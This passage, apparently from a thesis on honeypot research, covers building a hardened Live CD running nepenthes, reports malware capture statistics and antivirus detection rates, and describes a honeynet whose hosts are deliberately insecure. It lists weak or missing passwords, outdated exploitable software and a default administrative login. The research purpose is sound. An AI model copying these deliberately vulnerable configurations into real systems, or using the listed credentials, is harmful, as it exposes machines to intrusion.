Afterwards, we only have to mount the disk temporarily and edit the linuxrc start file to adapt the system messages to our needs. Mounting requires the use of a so-called loopback file interface. With the help of this interface, a regular file, in this case the ram disk image, can be mounted like a block device so that the file system it contains becomes accessible. When all changes are made, the disk can be unmounted and compressed again as described in Listing 4.5. Finally, we run the make_iso.sh command to build an image of the distribution with the new kernel and system components. A summary of the entire recompilation process is given in Figure 4.11. The development of the Live CD core is now completed. In the remaining sections, we illustrate customization operations to enhance the security and user friendliness of the CD.

    # create a temporary directory for the initial ram disk
    mkdir ramdisk

    # copy and uncompress the initial ram disk
    cp /boot/initrd.gz . && gunzip initrd.gz

    # mount the initial ram disk to the loopback file interface
    mount -t ext2 -o loop initrd ramdisk/

    # adapt the linuxrc start file
    ...

    # update and compress the initial ram disk
    umount ramdisk/ && gzip -9 initrd

Listing 4.5: Mounting the Initial Ram to Adapt the linuxrc Start File

Figure 4.11: Overview about the Recompilation Process of the Kernel

4.3.3.6 Hardening the System Environment

One of the major challenges of the Live CD is to ensure the safety and integrity of the underlying operating system. This means that, while it must be possible to compromise the emulated services of the honeypot, all other resources must be protected against attacks at all times. Preventing illegitimate access, data modification, or deletion requires a process which is known as system hardening. It involves measures on the network as well as on the physical layer (cmp.
Turnbull, 2005). In this section, however, we only cover network-related aspects. For more information on securing the physical level, please refer to the draft by the National Institute of Standards and Technology (1996). Our system protection scheme is twofold: First, we shut down all programs that are not vital at startup in order to minimize the number of potential entry points and vulnerabilities. As our Live CD is supposed to work as a single, independent data collection device, this includes network sharing and network connection applications. Second, we propose improving the authentication procedure for the SSH remote administration server and using so-called wrappers to limit access solely to certain IP addresses and ranges.

Reducing the number of started services: Generally, services on the Live CD are started by initialization scripts that are stored in the /etc/rc.d/ directory. As we have briefly explained in Section 4.3.1.1, these scripts are invoked by an init master process when the computer boots up and depend on a specific run level (see also Brockmeier, 2001). A run level determines the state the system is in, the provided functionality, and the mode of operation. At any given time, the state of the machine reflects one of the levels listed in Table 4.9. To disable a service, it is sufficient to revoke the execution permissions from its initialization script. As a result, the application is not loaded when the operating system is launched and does not get bound to a network port.
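When several services are to be disabled in one pass, the permission change can be wrapped in a small helper. The following is a minimal sketch under stated assumptions: the function name disable_services and its argument layout are hypothetical and not part of the Live CD; only the mechanism of removing the execute permission from an initialization script is taken from the text. The sketch uses chmod a-x so that the result does not depend on the current umask.

```shell
# Hypothetical helper: remove the execute bit from the named
# initialization scripts in a given directory.
# usage: disable_services DIR SCRIPT...
disable_services() {
    dir=$1
    shift
    for name in "$@"; do
        script="$dir/$name"
        if [ -f "$script" ]; then
            # without the execute bit, the script is not started at boot
            chmod a-x "$script"
            echo "disabled: $script"
        else
            echo "skipped (not found): $script" >&2
        fi
    done
}
```

A call such as disable_services /etc/rc.d rc.cups would then correspond to the manual chmod invocation for a single script. Scripts that are not named on the command line are left untouched.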
For example, to prevent the Common Unix Printing System (CUPS) from being executed at boot time, we change the access rights of the initialization script with the chmod command and the parameter -x as follows:

    chmod -x /etc/rc.d/rc.cups

Further candidates for removal may be identified with netstat, a utility for displaying active network connections and listening services. It is already part of the original Slax distribution. Repeating the chmod command for the initialization scripts of the services in question, we sequentially exclude all unneeded programs except the Postfix and SSH server from the boot sequence. Thus, we effectively reduce the attack surface of our Live CD to two system components.

    Run Level   Description
    0           System halt
    1           Single user mode
    2           Not defined
    3           Multiuser mode with networking enabled and console login
    4           Multiuser mode with networking enabled and graphical desktop manager
    5           Not defined
    6           System reboot

Table 4.9: Overview about the Run Levels of the Operating System (Source: Based on Brockmeier, 2001)

Improving the authentication mechanism for the SSH server: Even though the SSH server strongly facilitates remote maintenance of the distribution, the password-based login mechanism of the service still forms a possible weak spot. For instance, by generating a large dictionary of common words, names, and phrases, an attacker may be able to successfully guess the authentication credentials, log in, and compromise the system. For this reason, we suggest not relying solely on the strength of the chosen password but also verifying the identity of the user with an additional security token. The security token can be implemented as a combination of private and public keys. The public key can be freely distributed and is stored in a special directory on the CD. The corresponding private key is protected with a password and strictly remains with the user.
To log in, the correct password must be entered, and the location of the private key must be specified. Thus, the authentication process is based on two factors, and access is granted if, and only if, both these factors are fulfilled. In turn, if an intruder does not possess the private key or does not know the matching password, authentication fails, and access is rejected. An illustration of this process is shown in Figure 4.12; a more thorough explanation is given by Schneier (1996). To generate a valid key pair, we simply run the ssh-keygen command. The created public key must then be copied to the authorized_keys file in the .ssh/ directory of the system user. The private key must be transferred to a trusted machine and has to be kept secret. In the last step, we update the configuration file /etc/ssh/sshd_config of the SSH service to accept public key identification requests and reject password-only logins (cmp. Mates, 2008). After restarting the server, the two-factor authentication functionality is enabled.

Figure 4.12: Two-Factor Authentication Process of the SSH Remote Administration Service

Using TCP wrappers for access control: In order to impede illegitimate access to our CD, we can also make use of the TCP wrapper support the SSH remote maintenance application is compiled with. A TCP wrapper is a host-based network filter for system services (see Venema, 1992). Depending on a simple access control list (ACL), communication requests with a service are either accepted or denied. The access control list is defined by two files, hosts.allow and hosts.deny, that are stored in the main configuration directory of the distribution. For security purposes, we recommend creating access rules according to a whitelist, i.e., we only permit connections from specific machines while rejecting traffic from all others. A sample configuration for hosts within the subnet 192.168.1.0/24 is illustrated in Listing 4.6.
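To make the whitelist semantics more concrete, the following sketch imitates how a net/mask pattern such as 192.168.1.0/255.255.255.0 selects client addresses. It is only an illustration in plain shell arithmetic and not the matching code of the TCP wrapper library; the function names ip_to_int and ip_in_net are hypothetical, and the sketch assumes well-formed dotted-quad IPv4 addresses without leading zeros.

```shell
# Convert a dotted-quad IPv4 address to its 32-bit integer value.
ip_to_int() {
    old_ifs=$IFS
    IFS=.
    set -- $1          # split the address on dots into $1..$4
    IFS=$old_ifs
    echo $(( $1 * 16777216 + $2 * 65536 + $3 * 256 + $4 ))
}

# Succeed if address $1 lies in network $2 with netmask $3.
ip_in_net() {
    addr=$(ip_to_int "$1")
    net=$(ip_to_int "$2")
    mask=$(ip_to_int "$3")
    # the address matches if its network part equals that of the pattern
    [ $(( $addr & $mask )) -eq $(( $net & $mask )) ]
}
```

Under the rules of Listing 4.6, a client at 192.168.1.42 would match the sshd entry in hosts.allow, whereas a client at 192.168.2.42 would not match and would therefore be caught by the sshd: ALL rule in hosts.deny.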
    /etc/hosts.allow:
    # accept connections from the subnet 192.168.1.0/24
    sshd: 192.168.1.0/255.255.255.0

    /etc/hosts.deny:
    # reject requests from all other machines
    sshd: ALL

Listing 4.6: Example of a TCP Wrapper Configuration

As can be seen, wrappers, in cooperation with two-factor authentication, may thus add another layer of protection against attacks.

4.3.3.7 Customizing the Graphical User Interface

We have already pointed out that the usability and user friendliness of our Live CD are important criteria for system administrators and security professionals in order to carry out maintenance tasks quickly and focus on data collection and data analysis activities. For this reason, all honeypot and system functions are to be configured and executed within a graphical user interface. The original Slax distribution implements the K Desktop Environment (KDE) which is both reliable and stable. However, in its default configuration, KDE offers many functions that are not strictly required for our needs, for instance, multimedia playing capabilities. Consequently, we have to customize the existing environment and remove all dispensable components to make the user interface as intuitive as possible. Furthermore, we change many visual elements and system settings to create a unique and distinguishable look for our Live CD. For example, we add desktop icons and submenu entries to permit easy access to the honeypot module. We also adapt the desktop wallpaper, the appearance of the login and logoff screen, and the system color palette. As these operations involve modifying a large number of files and options, a complete and detailed presentation of all changes would not be beneficial. Instead, we describe the architecture of the KDE platform from a more abstract point of view for a better understanding.
The desktop environment as a whole consists of several individual applications that are split into software packages (see also Hall, 2005). For instance, the KDE base package comprises all core components such as the default window and file manager, a terminal emulator to provide access to the command shell, and a control center for administrative purposes. Each program also requires multiple system libraries that are part of the kdelibs package. Both these packages are included on the Live CD. Further optional features such as personal information management tools are, as we have already mentioned above, not strictly needed for our purposes and may thus be omitted to reduce complexity and keep the size of the distribution as small as possible. The different KDE applications are tightly interconnected and work collaboratively as it is indicated in Figure 4.13. One of the most important parts of the environment is the login manager kdm which is mainly responsible for user authentication. It is the first program to be launched in the KDE startup hierarchy. Kdm displays a graphical login screen and prompts users to enter their credentials. The appearance of this screen can be customized by editing the kdmrc configuration file which is stored in the /usr/share/config/kdm directory of the Live CD. Thereby, it is, for instance, possible to show a short greeting message or a custom logo when logging in. An explanation of the corresponding configuration directives is given by Buddenhagen (2007). When a valid username and password are entered, a new desktop session is prepared. For this purpose, a special startup script is invoked and a so-called master process gets executed. Similar to the init process of the operating system (cmp. 
Section 4.3.1.1), this master process acts as a parent for a number of further services that are started in the background, e.g., kcminit which supports different profiles and user-specific settings for hardware devices. The default configuration of these components is suitable for our distribution and does not need to be altered. In the last step, the ksmserver session manager is loaded. It sets up the desktop as well as the control panel, restores the state of previously run programs, and processes scripts that are stored in a predefined autostart folder. Since these activities greatly affect the visual design of KDE, applications that are started by the ksmserver are of particular relevance to the customization of the user interface.

Figure 4.13: Components of the KDE Platform

In the following, we illustrate the general customization procedure based on the central elements of the user environment: The KDE desktop and the control panel provide a comfortable way to open programs quickly, either by clicking on a desktop icon or by selecting an item in the system menu which is part of the control panel at the bottom of the screen. To adapt the appearance and behavior of these components, we can use the kcontrol and kmenuedit utilities that are integrated in KDE. Additionally, several built-in functions of the interface are of great help. For example, we are able to add, change, or remove desktop icons easily by choosing the respective command from a context menu. It is important to stress, though, that these modifications always apply to the current user only. Thus, the user-specific settings have to be transferred to the system level in order to implement the changes on a global scope. For this purpose, we must manually copy the individual configuration files to the designated folders in the directory hierarchy.
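The transfer of user-specific settings to the system level could be scripted roughly as follows. This is a sketch under stated assumptions rather than the procedure used for the Live CD: the helper name promote_kde_config is hypothetical, and the source and target directories are passed as arguments because the exact locations depend on the installation. Any existing system-wide file is kept as a backup copy before it is overwritten.

```shell
# Hypothetical helper: copy selected configuration files from a
# user-specific directory to a system-wide directory.
# usage: promote_kde_config USER_DIR SYSTEM_DIR FILE...
promote_kde_config() {
    src=$1
    dst=$2
    shift 2
    mkdir -p "$dst" || return 1
    for f in "$@"; do
        if [ ! -f "$src/$f" ]; then
            echo "missing: $src/$f" >&2
            return 1
        fi
        # keep a backup of an existing system-wide file
        if [ -f "$dst/$f" ]; then
            cp -p "$dst/$f" "$dst/$f.bak" || return 1
        fi
        cp -p "$src/$f" "$dst/$f" || return 1
    done
}
```

For instance, promote_kde_config "$HOME/.kde/share/config" /usr/share/config kdeglobals would promote the global KDE settings of the current user, assuming that the user-level files reside in the share/config subdirectory of ~/.kde.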
The specific user and system-wide directories that are relevant for this process are summarized in Table 4.10 (see also Bastian, 2004). Although these operations are cumbersome, they must be carried out with great care to maintain the integrity of the system. Once all modifications are completed, we have to update the file system modules and create a new version of the distribution as described in Section 4.3.3.1. Finally, we only need to burn the generated image to CD in order to finish the remastering and customization process of the Live CD. Two sample screenshots of the user interface are shown in Figure 4.14(a) and 4.14(b).

    Directory                  Description
    /usr/bin                   Stores the KDE executables, including the startup script and the KDM binary.
    /usr/lib                   Stores the libraries that are required for the desktop environment.
    /usr/share/services        Includes configurational settings for internal system services such as text or picture rendering engines.
    /usr/share/applications    Contains definition files for the desktop icons.
    /usr/share/config          Contains files with system-wide configurational directives. The file kdeglobals is processed by all KDE applications.
    /usr/share/icons,          Stores multimedia-related files that can be used by any KDE program.
    /usr/share/sounds,
    /usr/share/wallpapers
    ~/.kde, ~/.local           Contains user-specific settings and definitions. Configuration files that are stored in this directory tree take higher precedence over system-wide declarations.

Table 4.10: Important User and System-Wide Directories of the KDE Platform (Source: Based on Seigo, 2007)

Figure 4.14: User Interface of the Live CD. (a) Initialization of the Main Desktop Environment; (b) Running Instance of the nepenthes Honeypot
4.3.4 Capturing Autonomously Spreading Malware with the Live CD

In order to assess the operability of our Live CD, we have implemented a working prototype and captured autonomously spreading malware over a period of two months, from March 7, 2008 to May 7, 2008. Our test sensor was deployed in the IP range of a German private Internet service provider (ISP). Apart from minor reconfiguration and maintenance breaks, the system was continuously running 24 hours a day. For administrative reasons, the IP address of the machine was dynamically updated every night. An overview of the results of our research is given in the following section. However, we need to emphasize that these results must be regarded as preliminary. Further studies have to be conducted in the future to generate more empirically valid and representative statistics.

4.3.4.1 Overview about the Collected Data

Throughout the observation period, our Live CD sensor was targeted more than 46,000 times. Forty countries were involved in the incidents. However, more than 98% of all probes were traced to cities in Germany, the Russian Federation, and the United States (cmp. Figure 4.15). Regarding the intensity of the attacks, the number of malware samples nepenthes identified and tried to retrieve varied significantly (see Figure 4.16): While we detected almost 3,300 download attempts on May 4, this number dropped to the smallest value of 21 only three days later on May 7, the end of our experiment. On average, our honeypot sought to gather 837 binaries per day.

Figure 4.15: Origin and Intensity of Malware Attacks

Figure 4.16: Number of Detected Malware Downloads and Submissions per Day

However, it is also important to note that, in many cases, the collection process was not successfully completed, e.g., because the server the malicious software application resided on had been shut down in the meantime (cmp.
also Provos and Holz, 2007). For this reason, only 15,578 executables could be fetched. A list of the most frequent threats that we have seized with our Live CD can be found in Table 4.11. Each of the captured files was sent to a central analysis station for further investigation as explained in Section 4.3.2 (see also the red graph in Figure 4.16). Thereby, we were able to study its behavior in more detail. In particular, we examined outbound network connections that were initiated with the external environment as well as manipulations of the underlying system platform. An example of a summary report that was returned by the analysis station at the end of the examination process can be found on the accompanying CD of this thesis. A complete description of the functionality of the station is given by Willems et al. (2007). We also checked the set of unique submitted samples against 32 different virus scanners. A file is defined as unique if its cryptographic checksum differs from those of all other samples. A binary that is falsely classified as being uninfected in the course of this process indicates a severe threat, since it is not yet included in the definition database of the antivirus vendors and, thus, may potentially bypass the security restrictions of the local system. In total, 1,013 files were scanned. The results of these scans are briefly described in the next section.
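The uniqueness criterion can be illustrated with standard command line tools. The following is a minimal sketch, assuming that the captured binaries are stored as regular files in a single directory, that the checksum in question is MD5 (as listed in Table 4.11), and that the md5sum utility from the GNU core utilities is available; the function name count_unique_samples is hypothetical.

```shell
# Hypothetical helper: print the number of distinct MD5 checksums
# among the regular files stored in a directory.
# usage: count_unique_samples DIR
count_unique_samples() {
    dir=$1
    for f in "$dir"/*; do
        # hash the file contents only, so file names do not matter
        [ -f "$f" ] && cat "$f" | md5sum
    done | awk '{ print $1 }' | sort -u | wc -l | tr -d ' '
}
```

Two files with identical contents yield the same checksum and are therefore counted once, regardless of their names.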
    Malware                     MD5 Checksum                        Submissions
    Worm.VanBot.AX.215          954a98c971fda498f9d1211f18e75cd7    851
    Win32.Virut.AL              0c22f6dc09641566e42984323b869136    523
    Win32.Virut.AL (Variant)    175dffd2f768887fbd0b156383cf3b05    444
    Trojan.Dldr.Delf.buz        364389256ea74bb06d6825e7ee1689d9    417
    Worm.SdBot.100864.22        7fdfe363d51e27caa1b6d490646e66f5    410
    Worm.SdBot.444416           146d61fca77d748f5a5ecff53afd30e4    402
    Trojan.Agent.143360.4       2aa59ba4251795deda72738d1c67be7c    351
    Worm.VanBot.FO              bec892aaf3a5d697da7db26bb3d32028    331
    Win32.Virut.AL (Variant)    1000e2436a560eaeaa01a1029d8f33b4    276
    Win32.Virut.Gen             2383438901c46f3672b047961e8533b9    214

Table 4.11: Top Malware Samples Captured with the Live CD

4.3.4.2 Evaluation of the Collected Data

On average, the different virus scanners were capable of correctly identifying almost 82% of the malware samples. However, the quality of the individual software products differed dramatically in some cases. As indicated in Figure 4.17, only one of the 32 vendors detected more than 98% of the malicious applications. In contrast, four scanners erroneously reported more than 20% of the infected binaries as clean. The performance of the different solutions is illustrated in more detail in Figure 4.18. Even though most detection rates are comparatively high, it must also be stressed that about 10% of the captured executables were unrecognized by at least two vendors. In 27 cases, more than 80% of the scanners failed to discover the security threat. One binary with the cryptographic checksum b670a676045337c77838c8ab4597dfcb even slipped by completely and remained hidden from all tested products.

Figure 4.17: Detection Rates of 32 Antivirus Vendors

Figure 4.18: Individual Performance of 32 Antivirus Vendors

4.3.5 Summary

In this chapter, we have described the selection and development process of a Live CD-based honeypot.
A Live CD runs completely in memory and provides an operating system, a number of applications, as well as a basic user environment. When the machine is rebooted, changes made during runtime are reset, i.e., the decoy may be quickly restored after a compromise. Instead of building our own Live CD from scratch, we have decided to remaster an existing distribution and adjust its features to our needs. For this reason, we have evaluated various potential candidates and selected the Slackware-based Slax as a starting point for our project. Due to its modular design, it is comparatively easy to adapt. Furthermore, it is compatible with most modern computer systems and is actively supported by a lively community. Regarding the honeypot solution, we chose to implement nepenthes, a low-interaction decoy that is capable of collecting autonomously spreading malware on a large scale by emulating common vulnerabilities. It is highly scalable, consumes only small amounts of space and, thus, is well-suited for a Live CD environment with limited system resources. To ensure the security and integrity of the CD, the honeypot was packaged within its own file system module and is executed within a so-called jail. The jail provides a pseudo root directory and is physically strictly separated from other parts of the operating system. Additionally, by shutting down unnecessary services, using a two-factor authentication mechanism for the SSH remote administration server, and defining access control lists, we hardened the system further against attacks. We have developed a working prototype of the CD with its own system kernel, boot loader, and a customized graphical user interface. Over a period of two months, we have captured malware samples and collected more than 1,000 unique malicious binaries. Based on the data set, we have evaluated the performance of different antivirus solutions.
In sum, most samples were correctly reported as being suspicious. However, about one tenth of the executables were not properly recognized by the products and remained undetected. Our Live CD may help improve detection rates in the long term by finding new and unknown threats. Thereby, malicious activities on the Internet may potentially be measured and assessed more accurately.

5 Implementation, Deployment, and Analysis of a Honeynet

In the previous chapter of this thesis, we have described the development process of a Live CD-based low-interaction honeypot for capturing and analyzing autonomously propagating malware. As we have pointed out, by emulating a number of known security weaknesses, we were able to attract common species of malicious software, study their behavior, and generate statistical reports about their spread on the Internet. Although the collected data are beneficial for assessing the general level of threat from an abstract point of view, we learned only little about why systems are actually attacked and what they are used for once a compromise has succeeded. To help answer these questions, we set up a group of high-interaction honeypots within a honeynet. As explained in Chapter 3, this honeynet is a highly overt network environment as all incoming communication requests are passed to the interconnected machines without being filtered. On the other hand, outgoing traffic flows are tightly controlled by several layers of data capture and data control. As a consequence, we may implement full-featured operating systems, applications, and services that potentially allow monitoring more complex and sophisticated attacks. At the same time, we can keep the risk for non-affected third parties at a minimum. Due to the manifold possibilities for interaction, the individual electronic baits are likely to attract not only automatically spreading malware, but human attackers as well (cmp. Curran et al., 2005).
In comparison to low-interaction honeypots, we thus have the chance of gaining a more thorough insight into the psychology of adversaries and learning more about their tools, tactics, and motives.

Outline of the Chapter

In the following section, we outline the architecture of our honeynet and the respective system environment. We describe the technical specification of the individual honeypots, illustrate the deployment of the Honeywall, and introduce various tools and utilities that help monitor, capture, and analyze malicious activities. An overview of the data that we have collected with our honeynet is given in Section 5.2. We also sketch common attacks on the decoys that we have frequently detected during the observation period. Two selected system compromises are presented in more depth in Section 5.3. We conclude with an analysis of a covert underground communication channel and a short summary of our findings.

5.1 Overview about the Architecture of the Honeynet and the System Environment

The core of our honeynet consists of three independently running high-interaction honeypots that are set up within virtual machines for maintenance reasons as we have indicated in Chapter 2. Regarding the technical specification of the decoys, we decide to implement both Microsoft Windows and Linux operating systems. Thereby, we are able to measure intrusion attempts on two major platforms many desktop and server machines are based on (cmp. Net Applications, 2009). Additionally, we install several well-known web applications that commonly fall prey to attacks. These applications usually collaborate with further, underlying technologies such as database engines which are significantly more complex to administer and maintain.
Due to these reasons and an often poor quality of the source code (see Holz et al., 2006), vulnerabilities in either of these software tiers may possibly lead to a total system compromise. As web applications may thus involuntarily act as a “stepping stone into more sensitive parts of the victim’s network” (Riden et al., 2007), they are well-suited for our research purposes. We also set up a number of system services with certain misconfigurations that are likely to be discovered and exploited. For instance, we define improper access rights for a file transfer server and permit even non-authenticated users to upload and execute their own files. Thereby, we imitate the behavior of a so-called anonymous server which is frequently abused by software pirates to share illegally obtained media (see also McClure et al., 2005; Craig and Burnett, 2005). Because of the different security weaknesses, our honeypots form attractive targets for cyber criminals. In order to make their disclosure more difficult, we develop a bogus website for a fictional university chair, including phony information about lectures and academic curricula. Thus, we are able to embed the web applications and services in a more realistic scenario, making the machines appear as legitimate productive systems. It is important to stress though that an experienced attacker will presumably not be deceived by these activities but will rather be able to reveal the true nature of the decoys, e.g., by identifying specific anomalies in the system architecture (see Chapter 2 and Corey, 2003, 2004; Garfinkel et al., 2007). However, as these techniques usually require certain skills, we can still learn valuable information: As Provos and Holz (2007) conclude, “although honeypot detection might seem to be of more benefit to malicious adversaries, in computer security, it is important to understand all aspects of a system (...) and the flaws of your technology”. 
In the last step, we prepare several fake documents that we store on each of our machines. For example, we compose an executive summary for an imaginary project that contains valid account names and passwords to one of our honeypots. If an attacker retrieves the information and tries to log in, we can start tracing activities across multiple systems. As such, the documents act as honeytokens and prove unauthorized access of the respective resources (cmp. Spitzner, 2003f). More importantly, we are able to depict interactions between the various decoys, hence creating a potentially more accurate profile of the intruder as well as her intentions. The characteristics of the individual honeypots and their components are presented in more detail in the following.

5.1.1 Technical Specification of the Honeypots

As indicated in the previous section, we implement three electronic baits based on Microsoft Windows and Linux operating systems.

5.1.1.1 Microsoft Windows-Based Honeypot

The first honeypot we deploy runs a Microsoft Windows XP operating system with a pre-installed service pack 2. Access is permitted for the system administrator as well as for a non-privileged user. Both accounts are protected only with weak passwords. Therefore, we expect adversaries to perform dictionary and brute force attacks over the network in order to successfully compromise the host. Additionally, we set up the latest xampp [1] distribution by Kai Seidler. It comprises an Apache web server, the MySQL database management system, a basic file transfer server, and support for several programming languages such as PHP and Perl. In its default configuration, the distribution is inherently insecure (cmp. Vogelgesang, 2007). For example, the phpMyAdmin administrative user interface for the database management system [2] is fully accessible over the Internet.
As we will see later, this feature puts the security of the entire machine at risk. We also install the phpBB web application [3], a popular forum software which was originally developed by James Atkinson. The rather outdated version 2.0.8a is exposed to multiple vulnerabilities that may reveal potentially sensitive information such as the full path to the root directory (see Vind, 2005). Furthermore, the program contains several highly critical programming flaws that may help attackers get system access or manipulate data (see Secunia, 2004; CERT, 2004). Because of these characteristics, our machine forms a relatively easy target for intruders and is likely to be probed frequently.

5.1.1.2 Linux-Based Honeypots

Apart from the Windows-based honeypot, we run two electronic baits with Linux operating systems that are built on the Fedora Core and Suse distributions.

[1] see http://www.apachefriends.org/en/xampp.html
[2] see http://www.phpmyadmin.net/
[3] see http://www.phpbb.com/

• Fedora Core-Based Honeypot

The second decoy within our honeynet setup is implemented upon an installation of the Fedora Core 3 release [4]. It includes the Apache web server and the MySQL database management system. However, in comparison to the xampp distribution that we have introduced in the previous section, the configuration of the individual applications is more secure by default. For instance, the web server is started with non-privileged access permissions, and logins to databases are restricted to local users only. For this reason, we assume that intruders must attempt more sophisticated penetration strategies, e.g., executing exploits, to manipulate these services. Similar to the Windows-based honeypot, we run a web application, namely the TikiWiki content management system [5]. Version 1.8.4 of the software is affected by several critical security weaknesses (cmp. Secunia, 2009b).
For example, due to an input validation error, attackers may upload and run their own scripts in a temporary directory (see CVE, 2005). By passing specially crafted parameters to certain pages, it is also possible to read arbitrary files on the system and disclose sensitive information (see iDefense, 2005). In the next step, we set up communication and file transfer programs that form valuable targets for adversaries as well: First, we compile an outdated version of the WU-FTPD daemon [6] which is prone to a remote buffer overflow (see CVE, 2003). Since the exploit code for this vulnerability is publicly available (see Dong-Hun, 2003), we expect the computer to be compromised within a short amount of time. Furthermore, we redefine the configurational settings of the service and permit world-writable access to certain directories. As a consequence, our system appears as an anonymous server to the external environment and is likely to attract software pirates as explained in Section 5.1. Second, we install a secure shell server that contains a number of buffer management flaws. By abusing these flaws, attackers may inject malicious instructions and gain control of the machine (see CERT, 2003b). The server is also of great interest to intruders, because data flows are always sent over an encrypted channel. As a result, monitoring and filtering devices such as firewalls can be effectively bypassed.

• Suse-Based Honeypot

The third and last honeypot within our honeynet is built on a Suse Linux operating system, version 9.3. As is the case with the two other decoys, we run the default Apache web server and the MySQL database management system that are provided with the distribution. The latter is vulnerable to a remote buffer overrun and may cause arbitrary code execution or lead to a denial of service situation (see SecurityFocus, 2006a). The respective exploit is published by Paola (2006).
[4] see http://fedoraproject.org/
[5] see http://info.tikiwiki.org/tiki-index.php
[6] see http://www.wu-ftpd.org

We also deploy three web-based programs which may be attacked with different techniques: The phpMyFAQ application[7] permits implementing a bulletin board for frequently asked questions (FAQs). Version 1.6.6 suffers from various security weaknesses (cf. Secunia, 2009a). For instance, input parameters are not sanitized properly. Consequently, adversaries are able to manipulate database queries, inject malicious code, and penetrate the underlying system (see CVE, 2006b). The TR NewsPortal software[8] is a simple newsreader by Adam Glowienka. Due to an input validation error in release 0.36a, attackers can include their own scripts and compromise the host as demonstrated by Kacper (2006) (see also SecurityFocus, 2006b). Furthermore, the version of the phpMyAdmin database management utility that is distributed with our Linux installation contains multiple cross-site scripting (XSS) vulnerabilities. These make it possible to insert malicious code and potentially disclose sensitive information, e.g., authentication credentials (cf. SecurityFocus, 2006c).

Finally, we install a secure shell server as well as a Samba server to support remote interactions with the core system. A Samba server facilitates communication between machines in a hybrid environment by maintaining a number of directories that are globally shared in a network. In this way, computers running a Linux operating system can, for example, retrieve resources on a Windows-based host and vice versa (cf. Eckstein et al., 2007). We define several of these network shares with full access permissions on each honeypot. Thus, once a decoy is compromised, it may be used as a starting point to attack the remaining systems within our honeynet.
As a result, we can monitor incidents on a network-wide scope and gain a more thorough understanding of the strategies and intentions of the intruder.

The technical specifications of the individual honeypots are summarized in Table 5.1. As can be seen, the installed services and applications contain various vulnerabilities that are, for example, caused by input validation errors and poorly designed access permissions. When a decoy is successfully penetrated, it poses a significant threat to other machines on the network as well as to non-affected third parties. That is why we must make sure adversaries do not accidentally or purposefully harm systems outside of the honeynet (cf. Honeynet Project, 2004b, p. 38). We can mitigate that risk with the help of the Honeywall. The corresponding setup is the subject of the following section.

[7] see http://www.phpmyfaq.de/
[8] see http://www.newsportal.one.pl/

Table 5.1: Technical Specification of the Honeypots

Honeypot - Windows XP, Service Pack 2

Service Name | Description
Apache 2.2.8 | Web server which is required to run PHP-based applications and display dynamic content.
FileZilla 0.9.25 beta | FTP server that allows exchanging files over the Internet. The default authentication credentials for the administrative account are published “in the wild”. Therefore, intruders may easily gain access and explore the entire directory hierarchy as well as upload their own tools.
MySQL 5.0.51 | Database management system with built-in support for remote logins. The application can be quickly compromised, because the root superuser account is not protected with a password.

Web Application | Description
phpBB 2.0.8a | Forum software which contains several highly critical programming flaws and may disclose sensitive information as well as help attackers get access to the system.
phpMyAdmin 2.11.4 | Front end for the MySQL database management system. The application is fully accessible over the network and permits manipulating all databases that are stored on the machine.

Honeypot - Fedora Core 3

Service Name | Description
Apache 2.0.52 | Web server which is required to run PHP-based applications and display dynamic content.
MySQL 3.23.58 | Database management system which is solely protected with a weak password. Due to the configuration settings, however, logins are only possible after gaining shell-level access.
OpenSSH 3.7.1p1 | Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary commands may be executed on the host. Additionally, the server permits adversaries to establish encrypted communication channels. Thus, network eavesdropping is made more difficult.
WU-FTPd 2.6.0 | FTP server that permits anonymous write operations. As a result, the server can be abused by software pirates to store copyright-infringing material.

Web Application | Description
TikiWiki 1.8.4 | Content management system that does not validate user input properly. Consequently, intruders may upload their own scripts as well as read arbitrary files on the system.

Honeypot - Suse Linux 9.3

Service Name | Description
Apache 2.0.53 | Web server which is required to run PHP-based applications and display dynamic content.
MySQL 4.1.10a | Database management system that is affected by a buffer overrun vulnerability and may cause a denial of service situation.
OpenSSH 3.7.1p1 | Secure shell server that contains several buffer management flaws. If the vulnerabilities are abused, arbitrary commands may be executed on the host. Additionally, the server permits adversaries to establish encrypted communication channels. Thus, network eavesdropping is made more difficult.
Samba 3.0.12-5 | Software for providing file as well as printer sharing services across a network. Since network shares are defined on each machine, they may be used as a starting point for further attacks.

Web Application | Description
phpMyAdmin 2.6.1 | Front end for the MySQL database management system. The installed version is vulnerable to multiple cross-site scripting attacks and allows intruders to insert malicious code.
phpMyFAQ 1.6.6 | Bulletin board software for frequently asked questions that is prone to SQL and code injection techniques which may be exploited to gain system access.
TR NewsPortal 0.36a | Simple newsreader program that contains an input validation error and enables attackers to include their own scripts.

5.1.2 Deployment of the Honeywall

As we have already explained, the Honeywall acts as a gateway system to the honeynet through which all traffic flows have to pass. It comprises various monitoring and filtering devices such as IPTables, Snort, and Snort Inline that we have described in depth in Chapter 3. With the help of these applications, incoming and outgoing network packets can be inspected and, if required, even be discarded. In this way, attacks on the external environment can be effectively prevented. As such, the gateway meets the requirements for data control as imposed by the Honeynet Project (2004a) which are crucial to a safe deployment of electronic baits. Moreover, it satisfies the conditions concerning data capture and data analysis by providing several tools for monitoring, logging, and investigating malicious activities (see also Chapter 3). Because of these characteristics, the Honeywall is often regarded as the “heart” of a honeynet (cf. Provos and Holz, 2007).

We may easily set up the whole system including all components with the Roo CD which is distributed by the Honeynet Project. It can be downloaded for free from the project homepage[9].
When the CD is booted, it automatically begins to install a hardened Linux operating system. During this process, existing partitions and files on the hard disk of the machine are overwritten. For proper functionality in later use, we recommend a computer with at least 512 MB of memory, an x86 Intel Pentium processor, 10 GB of free disk space, and three network interface cards (NICs) (see Honeynet Project, 2007).

After completing the installation procedure, the system is rebooted, and we can start to customize the Honeywall according to our needs. For this purpose, we must log in with the default authentication credentials (username roo, password honey), switch to the superuser mode with the same password, and run the menu command to invoke the main configuration utility for the honeynet. The different configuration settings and parameters may then be adjusted with a dialog-based interview wizard. An overview of the most important options that must be specified during the interview is given in Table 5.2; the entire configuration file can be found on the accompanying CD of this thesis.

[9] see https://projects.honeynet.org/honeywall/

Table 5.2: Important Configuration Options of the Honeywall

Configuration Options | Description
Honeypot-Related Options | Honeypot-related options mainly comprise the network configuration for the individual decoys, e.g., the assigned IP address.
Management Interface-Related Options | With the help of these options, it is possible to set the network parameters for the Walleye web management interface such as the address of the default gateway, the DNS servers that are associated with the application, or the system name of the host.
CRLM Options | CRLM (Connection Rate Limiting Mode) options specify the number of outgoing connections that may be initiated by the honeypots before being filtered. The recommended settings for these options were outlined in Chapter 3.
